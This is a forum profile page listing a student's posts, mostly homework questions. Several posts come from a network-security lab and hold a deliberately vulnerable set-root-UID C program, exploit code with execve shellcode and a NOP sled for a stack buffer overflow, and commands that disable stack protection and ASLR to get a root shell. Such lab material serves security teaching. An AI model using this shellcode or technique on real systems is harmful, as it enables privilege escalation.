Jump to content

EonsNearby

Members
  • Posts

    11
  • Joined

  • Last visited

EonsNearby's Achievements

Quark

Quark (2/13)

0

Reputation

  1. I recently found and read this article that talks about pratically the same thing I am trying to do: http://web-agent.appspot.com/insecure.org/stf/smashstack.html Based on this, it sounds like I am getting the exploit correctly, but it just is not generating a root shell. "stack" is set-root-UID program while "exploit" is a user owned program. I am just supposed to run stack as a normal user and not root, which I can do but I can't get a root shell. Now that I know that I am getting the exploit, can someone make a suggestion as to why I am not getting a root shell?
  2. I tried increasing the size of bufferSize and codeSize (not at the same time), but still just generates a shell with user privileges. I've tried assigning a value to buffer[517], but even doing that won't generate a shell with root privileges. I know that the overflow occurs in the stack.c file, but I need to fill the "buffer" in exploit.c with the appropriate contents. I just don't know if what I am putting in it are the appropriate contents. I did find this as a possible solution, but I can't get it to work. I don't know if it will be of help or not, but: /* A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[] = "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ /* We have to use //sh instead of /sh, because we need 32-bit padding and /sh only uses 24 bits. Linux will ignore the extra slash, so we don't have a problem. */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ /* Load the arguments for the function on the stack */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ /* Call exec */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; int main(int argc, char **argv) { char buffer[500]; FILE *badfile; int i; unsigned char address[4]; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, sizeof(buffer)); /* You need to fill the buffer with appropriate contents here */ memcpy(&buffer[sizeof(buffer) - 100], shellcode, sizeof(shellcode)); /* Blow away the return address */ /* Don't forget your endian-ness!!!!! */ buffer[16] = 0x00; /* CHANGE ME (so this should be something like 0xB4 instead of 0x00 */ buffer[17] = 0x00; /* CHANGE ME */ buffer[18] = 0x00; /* CHANGE ME */ buffer[19] = 0x00; /* CHANGE ME */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, sizeof(buffer), 1, badfile); fclose(badfile); } I don't know what to change those "0x00" to. Before I was supposed to execute any of this, I had to execute this in root echo 0 > /proc/sys/kernel/randomize_va_space The lab however says I need to execute the following in root instead sysctl -w kernel.randomize_va_space=0 However, when I do the second one, then when I try to execute "stack", I get a "Segmentation fault".
  3. I am stuck on a lab assignment where I need to use a version of ubuntu in VMware Player to write some .c files that will use a buffer overflow vulnerability to generate a shell that has root privileges. I can only use the following 2 files: stack.c #include <stdio.h> int bof(char *str) { char buffer[12]; //BO Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[517]; FILE *badfile; badfile = fopen("badfile","r"); fread(str, sizeof(char),517, badfile); bof(str); printf("Returned Properly\n"); return 1; } exploit.c #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); } Here are the changes I made to exploit.c: #include <stdio.h> #include <stdlib.h> #include <string.h> #define DEFAULT_OFFSET 350 char shellcode[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char **argv) { char buffer[517]; FILE *badfile; char *ptr; long *a_ptr,ret; int offset = DEFAULT_OFFSET; int codeSize = sizeof(shellcode); int buffSize = sizeof(buffer); if(argc > 1) offset = atoi(argv[1]); //allows for command line input ptr=buffer; a_ptr = (long *) ptr; /* Initialize buffer with 0x90 (NOP instruction) */ memset(buffer, 0x90, buffSize); //----------------------BEGIN FILL BUFFER----------------------\\ ret = get_sp()+offset; printf("Return Address: 0x%x\n",get_sp()); printf("Address: 0x%x\n",ret); ptr = buffer; a_ptr = (long *) ptr; int i; for (i = 0; i < 300;i+=4) *(a_ptr++) = ret; for(i = 486;i < codeSize + 486;++i) buffer[i] = code[i-486]; buffer[buffSize - 1] = '\0'; //-----------------------END FILL BUFFER-----------------------\\ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer,517,1,badfile); fclose(badfile); } I execute the following in a terminal: $ su root $ Password] # gcc -o stack -fno-stack-protector stack.c # chmod 4755 stack # exit $ gcc -o exploit exploit.c $./exploit $./stack The "badfile" is created and a shell is generated, but the shell only has basic user privileges instead of root privileges. Can someone help me with this?
  4. This isn't a formal paper or anything, it is just an answer to a discussion question. As such, there are not multiple paragraphs. Heck, I don't even think it is supposed to be in paragraph format since I never indent.
  5. He doesn't want that. He just wants why some crimes go unreported in major industries.
  6. The question is the following: Why is crime reporting so low in "major industries? I am supposed to have a 1 page, double spaced response. However, I have only been able to come up with a little more than half a page, which is the following: One possible reason crime reporting is so low is to give the impression that the company is secure. This is a common strategy that is used to keep people from panicking and getting distracted from their assigned duties. This can also provide mild deterrence, because some hackers may not want to attack a company that has not had a successful at against it. They may just want to target companies and institutions that have suffered attacks before. Another possible reason crime reporting is so low in major industries is to protect the industries pride and dignity. For better or worse, those two can cause a company to fail. For example, if a major industry suffered from an attack and word got out about it, people would believe that the industry is not very secure. This could lead to people not wanting to work there or people not wanting to financially support it (like investing in the industry’s stock or purchasing products made by the industry). Also, other, competing companies that have not suffered an attack may exploit this weakness to insinuate their superiority over the attacked company. Can someone offer up some suggestions that could get me the desired length.
  7. Okay, I am able to find out that use of those encryption schemes is secure enough for some services, but I still cannot fill out 1 page with it. This all I am able to come up with: Question 2 This is similar to asking why people drive in cars or fly in airplanes even though they are dangerous. I think that the primary reason is that they are reasonably secure for civil applications. There are also several widely used encryption algorithms that are easy to modify, to make breaking them difficult. For example, DES can be made incredibly difficult and expensive to hack. If the number of possible keys is adequately large enough, “to dissuade the attacker from attempting exhaustively testing keys, and no easier attack on the algorithm can be found, then the designer of the algorithm has succeeded in providing adequate security.” [1] DES is also the only publicly available encryption algorithm to have been endorsed by the U.S. government. [1] In regards to RSA, there are some benefits it has that make it popular. For one, its key size can be increased to make hacking take longer. Also, anyone can use it without having to pay any fees, even if it is used in a private or commercial product. RSA can also perform encryption, decryption, and signature verification with the same two functions. Works Cited [1] http://media.johnwiley.com.au/product_data/excerpt/28/07803535/0780353528.pdf [ I also don't really get your hint. Is encryption itself still regulated in your country, or is it just the import and export of encryption systems? Also, were the encryption techniques "insecure" like DES and RSA?
  8. My main problem is that I can't really find anything about why people use "insecure" encryption algorithms (aside from my 2 initial ideas, but I can't really stretch that to 1 page). All I can really find out is what some widely used, "insecure" encryption algorithms are and why they are "insecure".
  9. I've only been looking into RSA and DES since that is what the question has specified. The only real reasons I have come up with as to why people use them is that they are both very common encryption algorithms and they are easier to "change" than other, more secure encryption algorithms.
  10. I am in a Computer Network Security class, and I have to answer 2 different discussion questions (each answer has to be about a page long). I am having trouble with one of them (the other I have yet to try to answer), so I was wondering if someone could help me with the question. Here it is: Most of the encryption standards that are being used such as RSA and DES have not been formally proven to be safe. Why then do we take them to be secure - what evidence do we have? Any help will be appreciated.
  11. I am in an Automata, Complexity, and Compatability class, and I was given a confusing assignment question. It is question 3, the one that starts on the bottom of page 1 and runs to page 2, on the pdf document attached. I have asked others for help, but they claim that there is a typo on question 3. They claim that where it says A≅C and B≅C , the B≅C should have been B ≅ D . However, when I contacted my teacher about it, he claims that is not a typo and he meant to write that. Because of it, they claim that the statement cannot be proven. I was just wondering if anyone here could help me get started with it, if it can be proven
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.